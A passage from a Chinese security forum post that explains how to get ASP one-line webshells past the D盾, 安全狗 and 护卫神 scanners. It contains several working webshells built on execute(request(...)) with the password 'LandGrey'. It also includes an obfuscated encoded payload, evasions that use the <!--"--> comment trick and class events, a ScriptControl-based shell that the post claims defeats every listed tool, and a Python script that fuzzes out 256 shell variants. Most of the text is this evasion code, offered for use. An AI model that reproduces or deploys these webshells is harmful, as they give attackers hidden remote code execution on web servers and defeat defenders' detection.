box-sizing: border-box; background: transparent;">glorysday.asp</a>：</p><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;"><a id="img5" href="https://xzfile.aliyuncs.com/media/upload/picture/20180525204729-c90dfdc2-6019-1.png" style="color: rgb(65, 131, 196); box-sizing: border-box; background: transparent;"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180525204729-c90dfdc2-6019-1.png" style="height: auto; max-width: 90%; vertical-align: middle; border: 0px; box-sizing: border-box; text-align: center; margin-left: auto; margin-right: auto; display: block; padding: 10px 0px;"/></a></p><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">构造以上代码需要：</p><ul style="padding: 0px 0px 0px 2em; margin-bottom: 24px; box-sizing: border-box;"><li style="line-height: 26px; box-sizing: border-box;">利用<strong style="box-sizing: border-box;">注释符</strong></li><li style="line-height: 26px; box-sizing: border-box;">利用<code style="padding-top: 0.2em; padding-bottom: 0.2em; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; color: rgb(221, 17, 68); border-radius: 3px; white-space: nowrap; background-color: rgba(0, 0, 0, 0.04); border: 1px solid rgb(225, 225, 232); box-sizing: border-box;">&#39;%></code>和<code style="padding-top: 0.2em; padding-bottom: 0.2em; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; color: rgb(221, 17, 68); border-radius: 3px; white-space: nowrap; background-color: rgba(0, 0, 0, 0.04); border: 1px solid rgb(225, 225, 232); box-sizing: border-box;">&#39;<%</code>分别闭合前后标签</li><li style="line-height: 26px; box-sizing: border-box;">填充大量垃圾<code style="padding-top: 0.2em; padding-bottom: 0.2em; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; color: rgb(221, 17, 68); border-radius: 3px; white-space: nowrap; background-color: rgba(0, 0, 0, 0.04); border: 1px solid rgb(225, 225, 232); box-sizing: border-box;"><%%></code>标签，且最后文件体积大小要合适(测试发现文件大小约>0.97 MB)</li><li style="line-height: 26px; box-sizing: border-box;">必须要在<strong style="box-sizing: border-box;">一定位置</strong>插入至少一个<code style="padding-top: 0.2em; padding-bottom: 0.2em; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; color: rgb(221, 17, 68); border-radius: 3px; white-space: nowrap; background-color: rgba(0, 0, 0, 0.04); border: 1px solid rgb(225, 225, 232); box-sizing: border-box;"><??></code>字符串</li></ul><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">页面浏览该脚本页面，就会发现很多作为注释符，但没生效的单引号</p><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;"><a id="img6" href="https://xzfile.aliyuncs.com/media/upload/picture/20180525204729-c91c319e-6019-1.png" style="color: rgb(65, 131, 196); box-sizing: border-box; background: transparent;"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180525204729-c91c319e-6019-1.png" style="height: auto; max-width: 90%; vertical-align: middle; border: 0px; box-sizing: border-box; text-align: center; margin-left: auto; margin-right: auto; display: block; padding: 10px 0px;"/></a></p><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">使用Cknife可以正常连接该一句话</p><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;"><a id="img7" href="https://xzfile.aliyuncs.com/media/upload/picture/20180525204730-c92d111c-6019-1.png" style="color: rgb(65, 131, 196); box-sizing: border-box; background: transparent;"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180525204730-c92d111c-6019-1.png" style="height: auto; max-width: 90%; vertical-align: middle; border: 0px; box-sizing: border-box; text-align: center; margin-left: auto; margin-right: auto; display: block; padding: 10px 0px;"/></a></p><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">上面提到的的特殊位置插入<code style="padding-top: 0.2em; padding-bottom: 0.2em; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; color: rgb(221, 17, 68); border-radius: 3px; white-space: nowrap; background-color: rgba(0, 0, 0, 0.04); border: 1px solid rgb(225, 225, 232); box-sizing: border-box;"><??></code>是绕过检测的必要手段，不能增减一个字符。具体原因可能和D盾软件内部实现的Bug有关，这里不深入追究，感兴趣的同学可以自己接着去研究。</p><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">脚本中作为注释符号的单引号，可以使用其它三种注释符替换，依然可以绕过。</p><h4 id="toc-7" style="margin-top: 1em; margin-bottom: 16px; font-family: inherit; font-weight: bold; line-height: 1.4; color: inherit; text-rendering: optimizeLegibility; font-size: 18px; box-sizing: border-box; position: relative;">二. 使用<code style="padding-top: 0.2em; padding-bottom: 0.2em; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 15.3px; color: rgb(221, 17, 68); border-radius: 3px; white-space: nowrap; background-color: rgba(0, 0, 0, 0.04); border: 1px solid rgb(225, 225, 232); box-sizing: border-box;"><!--"--></code>百分百绕过D盾检测</h4><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">靠着运气和玄学的成份，我们绕过了<strong style="box-sizing: border-box;">D盾Web查杀</strong>检测。既然注释符号和<code style="padding-top: 0.2em; padding-bottom: 0.2em; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; color: rgb(221, 17, 68); border-radius: 3px; white-space: nowrap; background-color: rgba(0, 0, 0, 0.04); border: 1px solid rgb(225, 225, 232); box-sizing: border-box;"><??></code>符号对D盾来说会产生意想不到的Bug效果，那么猜想，可能会有其它更简单的方式，绕过D盾的检测。</p><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">首先选个一定会被杀掉的简单ASP一句话脚本：</p><pre style="padding: 16px; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; border-radius: 3px; margin-top: 0px; margin-bottom: 24px; line-height: 1.6; word-break: break-all; word-wrap: normal; white-space: pre-wrap; background-color: rgb(247, 247, 247); border: 1px solid rgba(0, 0, 0, 0.15); box-sizing: border-box; font-variant-numeric: normal; font-variant-east-asian: normal; font-stretch: normal; overflow: auto;"><%
execute(request("LandGrey"))
%></pre><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">我们在脚本中的第一个<code style="padding-top: 0.2em; padding-bottom: 0.2em; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; color: rgb(221, 17, 68); border-radius: 3px; white-space: nowrap; background-color: rgba(0, 0, 0, 0.04); border: 1px solid rgb(225, 225, 232); box-sizing: border-box;"><%</code>符号标记后面，<code style="padding-top: 0.2em; padding-bottom: 0.2em; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; color: rgb(221, 17, 68); border-radius: 3px; white-space: nowrap; background-color: rgba(0, 0, 0, 0.04); border: 1px solid rgb(225, 225, 232); box-sizing: border-box;">execute</code>标记前面，插入不同字符，查看D盾的检测反应。用下面的Python脚本在两个标记中间插入ascii值为0-255的字符，批量生成测试脚本</p><div class="highlight" style="box-sizing: border-box; margin-bottom: 16px;"><pre style="padding: 16px; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; border-radius: 3px; margin-top: 0px; margin-bottom: 0px; line-height: 1.6; word-break: normal; word-wrap: normal; white-space: pre-wrap; background-color: rgb(247, 247, 247); border: 1px solid rgba(0, 0, 0, 0.15); box-sizing: border-box; font-variant-numeric: normal; font-variant-east-asian: normal; font-stretch: normal; overflow: auto;">#!/usr/bin/env&nbsp;python#&nbsp;coding:utf-8import&nbsp;osdef&nbsp;generate(count):
&nbsp;&nbsp;&nbsp;&nbsp;template&nbsp;=&nbsp;"""<%{0}execute(request("LandGrey"))%>""".format(chr(count))
&nbsp;&nbsp;&nbsp;&nbsp;with&nbsp;open(os.path.join(path,&nbsp;"fuzz_{}.asp".format(count)),&nbsp;&#39;w&#39;)&nbsp;as&nbsp;f:
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;f.write(template)path&nbsp;=&nbsp;r"/path/to/yours/"for&nbsp;c&nbsp;in&nbsp;range(0,&nbsp;256):
&nbsp;&nbsp;&nbsp;&nbsp;generate(c)</pre></div><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">然后用D盾检测，出现了较为意外的结果，发现256个文件中，只检测出来了122个Webshell。</p><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;"><a id="img8" href="https://xzfile.aliyuncs.com/media/upload/picture/20180525204730-c942f91e-6019-1.png" style="color: rgb(65, 131, 196); box-sizing: border-box; background: transparent;"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180525204730-c942f91e-6019-1.png" style="height: auto; max-width: 90%; vertical-align: middle; border: 0px; box-sizing: border-box; text-align: center; margin-left: auto; margin-right: auto; display: block; padding: 10px 0px;"/></a></p><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">选一个没有检测到的脚本fuzz_34.asp，发现只是增加了一个双引号<code style="padding-top: 0.2em; padding-bottom: 0.2em; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; color: rgb(221, 17, 68); border-radius: 3px; white-space: nowrap; background-color: rgba(0, 0, 0, 0.04); border: 1px solid rgb(225, 225, 232); box-sizing: border-box;">"</code>。当然，多个<code style="padding-top: 0.2em; padding-bottom: 0.2em; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; color: rgb(221, 17, 68); border-radius: 3px; white-space: nowrap; background-color: rgba(0, 0, 0, 0.04); border: 1px solid rgb(225, 225, 232); box-sizing: border-box;">"</code>双引号这个脚本也不能正常执行了。</p><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">然后就结合四种VBscript可用的注释符，尝试找到能让脚本能正常执行，又绕过工具检测的方法。结果发现使用<code style="padding-top: 0.2em; padding-bottom: 0.2em; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; color: rgb(221, 17, 68); border-radius: 3px; white-space: nowrap; background-color: rgba(0, 0, 0, 0.04); border: 1px solid rgb(225, 225, 232); box-sizing: border-box;"><!-- --></code>注释符加双引号<code style="padding-top: 0.2em; padding-bottom: 0.2em; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; color: rgb(221, 17, 68); border-radius: 3px; white-space: nowrap; background-color: rgba(0, 0, 0, 0.04); border: 1px solid rgb(225, 225, 232); box-sizing: border-box;">"</code>的形式，构造出<code style="padding-top: 0.2em; padding-bottom: 0.2em; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; color: rgb(221, 17, 68); border-radius: 3px; white-space: nowrap; background-color: rgba(0, 0, 0, 0.04); border: 1px solid rgb(225, 225, 232); box-sizing: border-box;"><!--"--></code>字符串，就可以利用D盾的软件缺陷，完全绕过D盾的ASP木马检测。让先前被杀的脚本，插上放飞的翅膀。</p><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">一个可以绕过D盾检测的简单脚本<a href="https://github.com/LandGrey/webshell-detect-bypass/blob/master/webshell/asp/use-html-annotator-bypass.asp" target="_blank" style="color: rgb(65, 131, 196); box-sizing: border-box; background: transparent;">use-html-annotator-bypass.asp</a>如下：</p><pre style="padding: 16px; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; border-radius: 3px; margin-top: 0px; margin-bottom: 24px; line-height: 1.6; word-break: break-all; word-wrap: normal; white-space: pre-wrap; background-color: rgb(247, 247, 247); border: 1px solid rgba(0, 0, 0, 0.15); box-sizing: border-box; font-variant-numeric: normal; font-variant-east-asian: normal; font-stretch: normal; overflow: auto;"><%
<!--"-->
execute&nbsp;request("LandGrey")
%></pre><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">其它几乎所有的ASP木马脚本，只要在上面提到的正确位置插入了<code style="padding-top: 0.2em; padding-bottom: 0.2em; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; color: rgb(221, 17, 68); border-radius: 3px; white-space: nowrap; background-color: rgba(0, 0, 0, 0.04); border: 1px solid rgb(225, 225, 232); box-sizing: border-box;"><!--"--></code>字符串，都可以绕过D盾的检测。</p><h3 id="toc-8" style="margin-top: 1em; margin-bottom: 16px; font-family: inherit; font-weight: bold; line-height: 1.43; color: inherit; text-rendering: optimizeLegibility; font-size: 20px; box-sizing: border-box; position: relative;">0x06: 绕过安全狗检测</h3><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">在"<strong style="box-sizing: border-box;">0x05:绕过D盾检测</strong>"部分，我们找到了两种绕过方法。有趣的是，测试发现安全狗也部分存在<code style="padding-top: 0.2em; padding-bottom: 0.2em; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; color: rgb(221, 17, 68); border-radius: 3px; white-space: nowrap; background-color: rgba(0, 0, 0, 0.04); border: 1px solid rgb(225, 225, 232); box-sizing: border-box;"><!--"--></code>绕过的Bug问题。</p><h4 id="toc-9" style="margin-top: 1em; margin-bottom: 16px; font-family: inherit; font-weight: bold; line-height: 1.4; color: inherit; text-rendering: optimizeLegibility; font-size: 18px; box-sizing: border-box; position: relative;">一.使用<code style="padding-top: 0.2em; padding-bottom: 0.2em; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 15.3px; color: rgb(221, 17, 68); border-radius: 3px; white-space: nowrap; background-color: rgba(0, 0, 0, 0.04); border: 1px solid rgb(225, 225, 232); box-sizing: border-box;"><!--"--></code>符号绕过检测</h4><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">如下图的两个脚本</p><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;"><a id="img9" href="https://xzfile.aliyuncs.com/media/upload/picture/20180525204730-c951b3dc-6019-1.png" style="color: rgb(65, 131, 196); box-sizing: border-box; background: transparent;"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180525204730-c951b3dc-6019-1.png" style="height: auto; max-width: 90%; vertical-align: middle; border: 0px; box-sizing: border-box; text-align: center; margin-left: auto; margin-right: auto; display: block; padding: 10px 0px;"/></a></p><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">用安全狗进行检测，只要插入了<code style="padding-top: 0.2em; padding-bottom: 0.2em; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; color: rgb(221, 17, 68); border-radius: 3px; white-space: nowrap; background-color: rgba(0, 0, 0, 0.04); border: 1px solid rgb(225, 225, 232); box-sizing: border-box;"><!--"--></code>字符串，就可以绕过。</p><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;"><a id="img10" href="https://xzfile.aliyuncs.com/media/upload/picture/20180525204730-c961bf98-6019-1.png" style="color: rgb(65, 131, 196); box-sizing: border-box; background: transparent;"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180525204730-c961bf98-6019-1.png" style="height: auto; max-width: 90%; vertical-align: middle; border: 0px; box-sizing: border-box; text-align: center; margin-left: auto; margin-right: auto; display: block; padding: 10px 0px;"/></a></p><h4 id="toc-10" style="margin-top: 1em; margin-bottom: 16px; font-family: inherit; font-weight: bold; line-height: 1.4; color: inherit; text-rendering: optimizeLegibility; font-size: 18px; box-sizing: border-box; position: relative;">二. 其它多种方式绕过</h4><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">其它绕过安全狗检测的方式还是比较多的，前面的VBscript encode脚本<a href="https://github.com/LandGrey/webshell-detect-bypass/blob/master/webshell/asp/vbencode-bypass.asp" target="_blank" style="color: rgb(65, 131, 196); box-sizing: border-box; background: transparent;">vbencode-bypass.asp</a>就可以绕过。另外，再列出来两种利用语法特性绕过的示例程序：</p><h5 style="margin-top: 1em; margin-bottom: 16px; font-family: inherit; font-weight: bold; line-height: 1.4; color: inherit; text-rendering: optimizeLegibility; font-size: 1em; box-sizing: border-box; position: relative;">方法一：请求判断</h5><pre style="padding: 16px; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; border-radius: 3px; margin-top: 0px; margin-bottom: 24px; line-height: 1.6; word-break: break-all; word-wrap: normal; white-space: pre-wrap; background-color: rgb(247, 247, 247); border: 1px solid rgba(0, 0, 0, 0.15); box-sizing: border-box; font-variant-numeric: normal; font-variant-east-asian: normal; font-stretch: normal; overflow: auto;"><%if&nbsp;Request("LandGrey")<>""&nbsp;then&nbsp;ExecuteGlobal&nbsp;request("LandGrey")&nbsp;end&nbsp;if&nbsp;%></pre><h5 style="margin-top: 1em; margin-bottom: 16px; font-family: inherit; font-weight: bold; line-height: 1.4; color: inherit; text-rendering: optimizeLegibility; font-size: 1em; box-sizing: border-box; position: relative;">方法二：request变量替换</h5><pre style="padding: 16px; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; border-radius: 3px; margin-top: 0px; margin-bottom: 24px; line-height: 1.6; word-break: break-all; word-wrap: normal; white-space: pre-wrap; background-color: rgb(247, 247, 247); border: 1px solid rgba(0, 0, 0, 0.15); box-sizing: border-box; font-variant-numeric: normal; font-variant-east-asian: normal; font-stretch: normal; overflow: auto;"><%if&nbsp;request("LandGrey")<>""then&nbsp;session("LandGrey")=request("LandGrey"):end&nbsp;if:if&nbsp;session("LandGrey")<>""&nbsp;then&nbsp;execute&nbsp;session("LandGrey")%></pre><h3 id="toc-11" style="margin-top: 1em; margin-bottom: 16px; font-family: inherit; font-weight: bold; line-height: 1.43; color: inherit; text-rendering: optimizeLegibility; font-size: 20px; box-sizing: border-box; position: relative;">0x07: 绕过护卫神检测</h3><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">生活为你推开大门，打开一扇窗的同时，不会再为你预留一个狗洞。上面讲的<code style="padding-top: 0.2em; padding-bottom: 0.2em; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; color: rgb(221, 17, 68); border-radius: 3px; white-space: nowrap; background-color: rgba(0, 0, 0, 0.04); border: 1px solid rgb(225, 225, 232); box-sizing: border-box;"><!--"--></code>方法并不是无敌的存在，绕不过护卫神的检测。</p><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">所以继续重拾老本行，继续查看官方语法手册。护卫神有两种查杀模式，对于"<strong style="box-sizing: border-box;">极限模式</strong>"，用VBscript的两种类事件可以绕过检测</p><h5 style="margin-top: 1em; margin-bottom: 16px; font-family: inherit; font-weight: bold; line-height: 1.4; color: inherit; text-rendering: optimizeLegibility; font-size: 1em; box-sizing: border-box; position: relative;">一. 利用类初始化事件绕过</h5><pre style="padding: 16px; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; border-radius: 3px; margin-top: 0px; margin-bottom: 24px; line-height: 1.6; word-break: break-all; word-wrap: normal; white-space: pre-wrap; background-color: rgb(247, 247, 247); border: 1px solid rgba(0, 0, 0, 0.15); box-sizing: border-box; font-variant-numeric: normal; font-variant-east-asian: normal; font-stretch: normal; overflow: auto;"><%
Class&nbsp;LandGrey
&nbsp;&nbsp;Private&nbsp;Sub&nbsp;Class_Initialize
&nbsp;&nbsp;&nbsp;&nbsp;eval&nbsp;&nbsp;&nbsp;&nbsp;(request("LandGrey"))
&nbsp;&nbsp;End&nbsp;Sub
End&nbsp;Class

Set&nbsp;X&nbsp;=&nbsp;New&nbsp;LandGrey
%></pre><h5 style="margin-top: 1em; margin-bottom: 16px; font-family: inherit; font-weight: bold; line-height: 1.4; color: inherit; text-rendering: optimizeLegibility; font-size: 1em; box-sizing: border-box; position: relative;">二. 利用类卸载事件绕过</h5><pre style="padding: 16px; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; border-radius: 3px; margin-top: 0px; margin-bottom: 24px; line-height: 1.6; word-break: break-all; word-wrap: normal; white-space: pre-wrap; background-color: rgb(247, 247, 247); border: 1px solid rgba(0, 0, 0, 0.15); box-sizing: border-box; font-variant-numeric: normal; font-variant-east-asian: normal; font-stretch: normal; overflow: auto;"><%
Class&nbsp;LandGrey
&nbsp;&nbsp;Private&nbsp;Sub&nbsp;class_terminate
&nbsp;&nbsp;&nbsp;&nbsp;eval&nbsp;&nbsp;&nbsp;&nbsp;(request("LandGrey"))
&nbsp;&nbsp;End&nbsp;Sub
End&nbsp;Class

Set&nbsp;X&nbsp;=&nbsp;New&nbsp;LandGrey
Set&nbsp;X&nbsp;=&nbsp;Nothing
%></pre><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;"><a id="img11" href="https://xzfile.aliyuncs.com/media/upload/picture/20180525204730-c9723e72-6019-1.png" style="color: rgb(65, 131, 196); box-sizing: border-box; background: transparent;"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180525204730-c9723e72-6019-1.png" style="height: auto; max-width: 90%; vertical-align: middle; border: 0px; box-sizing: border-box; text-align: center; margin-left: auto; margin-right: auto; display: block; padding: 10px 0px;"/></a></p><h5 style="margin-top: 1em; margin-bottom: 16px; font-family: inherit; font-weight: bold; line-height: 1.4; color: inherit; text-rendering: optimizeLegibility; font-size: 1em; box-sizing: border-box; position: relative;">三. 花式语法绕过</h5><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">然而选了"<strong style="box-sizing: border-box;">通用模式</strong>"后，上面两个一句话木马就都失效了。但还是有方法能同时绕过护卫神的两种模式，用下面的<a href="https://github.com/LandGrey/webshell-detect-bypass/blob/master/webshell/asp/bypass-all.asp" target="_blank" style="color: rgb(65, 131, 196); box-sizing: border-box; background: transparent;">bypass-all.asp</a>脚本(密码"LandGrey")即可</p><pre style="padding: 16px; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; border-radius: 3px; margin-top: 0px; margin-bottom: 24px; line-height: 1.6; word-break: break-all; word-wrap: normal; white-space: pre-wrap; background-color: rgb(247, 247, 247); border: 1px solid rgba(0, 0, 0, 0.15); box-sizing: border-box; font-variant-numeric: normal; font-variant-east-asian: normal; font-stretch: normal; overflow: auto;"><%<!--"-->
eXecUTe(fun("%167%184%163%174%98%180%167%179%183%167%181%182%106%100%142%163%176%166%137%180%167%187%100%107"))

Function&nbsp;fun(Str):
&nbsp;&nbsp;&nbsp;&nbsp;Str&nbsp;=&nbsp;Split(Str,"%")
&nbsp;&nbsp;&nbsp;&nbsp;For&nbsp;x=1&nbsp;To&nbsp;Ubound(Str)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;fun=fun&Chr(Str(x)-66)
&nbsp;&nbsp;&nbsp;&nbsp;Next
End&nbsp;Function
%></pre><h3 id="toc-12" style="margin-top: 1em; margin-bottom: 16px; font-family: inherit; font-weight: bold; line-height: 1.43; color: inherit; text-rendering: optimizeLegibility; font-size: 20px; box-sizing: border-box; position: relative;">0x07: 总结</h3><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">其余的工具和平台都大同小异，效果远不如D盾和护卫神，没必要单独针对绕过。上面的<a href="https://github.com/LandGrey/webshell-detect-bypass/blob/master/webshell/asp/bypass-all.asp" target="_blank" style="color: rgb(65, 131, 196); box-sizing: border-box; background: transparent;">bypass-all.asp</a>脚本就足够绕过上面的表格中所有的平台和工具了。</p><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">最后再给出一个可以绕过表格中所有工具和平台检测的一句话脚本<a href="https://github.com/LandGrey/webshell-detect-bypass/blob/master/webshell/asp/create-activex-object.asp" target="_blank" style="color: rgb(65, 131, 196); box-sizing: border-box; background: transparent;">create-activex-object.asp</a>，密码"LandGrey"。其原理是利用ASP内置的CreateObject创建ScriptControl组件对象，然后执行VBscript代码。VBscript代码中接受来自请求的参数变量值，并当作VBscript代码执行。</p><pre style="padding: 16px; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; border-radius: 3px; margin-top: 0px; margin-bottom: 24px; line-height: 1.6; word-break: break-all; word-wrap: normal; white-space: pre-wrap; background-color: rgb(247, 247, 247); border: 1px solid rgba(0, 0, 0, 0.15); box-sizing: border-box; font-variant-numeric: normal; font-variant-east-asian: normal; font-stretch: normal; overflow: auto;"><%@&nbsp;language&nbsp;=&nbsp;VBscript&nbsp;%>
<%<!--%^_^%-->
SET&nbsp;LandGrey&nbsp;=&nbsp;server.CreateObject("mS"&chr(115)&"cR"&chr(105)&"pTCo"&Chr(110)&Chr(84)&"rOL.Sc"&chr(114)&"IpTCo"&Chr(110)&Chr(84)&"rOL.1")&nbsp;
LandGrey.lANguaGE&nbsp;=&nbsp;cHr(86)&"BsC"&CHR(114)&chr(105)&"PT"
LandGrey.AddObject&nbsp;"REsponse",&nbsp;Response&nbsp;
LandGrey.AddObject&nbsp;"r"&chr(101)&"quEst",&nbsp;requesT&nbsp;
LandGrey.AddObject&nbsp;"s"&chr(101)&"ssIon",&nbsp;sessiOn&nbsp;
LandGrey.AddObject&nbsp;"serv"&chr(101)&"r",&nbsp;serVer&nbsp;
LandGrey.AddObject&nbsp;"apPlic"&CHR(97)&"tIon",&nbsp;application&nbsp;
LandGrey.eXECuTeStAtEmENt("eV"&CHr(&0141)&"L"&Chr(40)&"rEqU"&cHr(101)&"St("&chr(34)&"LandGrey"&chr(34)&CHR(41)&")")
%></pre><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;"><a id="img12" href="https://xzfile.aliyuncs.com/media/upload/picture/20180525204730-c9968250-6019-1.png" style="color: rgb(65, 131, 196); text-decoration-line: underline; box-sizing: border-box; outline: 0px; outline-offset: -2px; background: transparent;"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180525204730-c9968250-6019-1.png" style="height: auto; max-width: 90%; vertical-align: middle; border: 0px; box-sizing: border-box; text-align: center; margin-left: auto; margin-right: auto; display: block; padding: 10px 0px;"/></a></p><h3 id="toc-13" style="margin-top: 1em; margin-bottom: 16px; font-family: inherit; font-weight: bold; line-height: 1.43; color: inherit; text-rendering: optimizeLegibility; font-size: 20px; box-sizing: border-box; position: relative;">参考链接：</h3><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;"><a href="https://github.com/search?utf8=%E2%9C%93&q=webshell&type=" target="_blank" style="color: rgb(65, 131, 196); box-sizing: border-box; background: transparent;">https://github.com/search?utf8=%E2%9C%93&q=webshell&type=</a></p><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;"><a href="http://www.cnblogs.com/LittleHann/p/5016999.html" target="_blank" style="color: rgb(65, 131, 196); box-sizing: border-box; background: transparent;">http://www.cnblogs.com/LittleHann/p/5016999.html</a></p><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;"><a href="http://www.365jz.com/handbook/asp/" target="_blank" style="color: rgb(65, 131, 196); box-sizing: border-box; background: transparent;">http://www.365jz.com/handbook/asp/</a></p><p style="margin-top: 0px; box-sizing: border-box; margin-bottom: 0px !important;"></p></div><div class="post-user-action"><span class="btn btn-default pull-right" id="mark" style="padding: 4px 12px; margin: 0px 10px 0px 0px; line-height: 21px; color: rgb(68, 68, 68); text-shadow: rgba(255, 255, 255, 0.75) 0px 1px 1px; vertical-align: middle; background-color: rgb(244, 244, 244); background-image: none; background-repeat: repeat-x; border-width: initial; border-style: none; border-color: initial; border-radius: 2px; box-shadow: rgba(255, 255, 255, 0.2) 0px 1px 0px inset, rgba(0, 0, 0, 0.05) 0px 1px 2px; font-family: "Helvetica Neue For Number", -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei", "Helvetica Neue", Helvetica, Arial, sans-serif; box-sizing: border-box; list-style: none; font-weight: 400; white-space: nowrap; height: 32px; user-select: none; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal;"><span id="mark-text">点击收藏&nbsp;</span><span class="i-seprator" style="color: rgba(0, 0, 0, 0.1); margin: 0px 2px;">|&nbsp;</span><span id="mark-count">2</span></span><span class="btn btn-default pull-right" id="follow_topic" style="padding: 4px 12px; margin: 0px 10px 0px 0px; line-height: 21px; color: rgb(68, 68, 68); text-shadow: rgba(255, 255, 255, 0.75) 0px 1px 1px; vertical-align: middle; background-color: rgb(244, 244, 244); background-image: none; background-repeat: repeat-x; border-width: initial; border-style: none; border-color: initial; border-radius: 2px; box-shadow: rgba(255, 255, 255, 0.2) 0px 1px 0px inset, rgba(0, 0, 0, 0.05) 0px 1px 2px; font-family: "Helvetica Neue For Number", -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei", "Helvetica Neue", Helvetica, Arial, sans-serif; box-sizing: border-box; list-style: none; font-weight: 400; white-space: nowrap; height: 32px; user-select: none; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal;">关注<span class="i-seprator" style="color: rgba(0, 0, 0, 0.1); margin: 0px 2px;">&nbsp;|&nbsp;</span><span id="follow-count">1</span></span><div><br/></div></div>

打赏我,让我更有动力~

0 条回复   |  直到 2018-5-28 | 2836 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2025 掌控者 All Rights Reserved.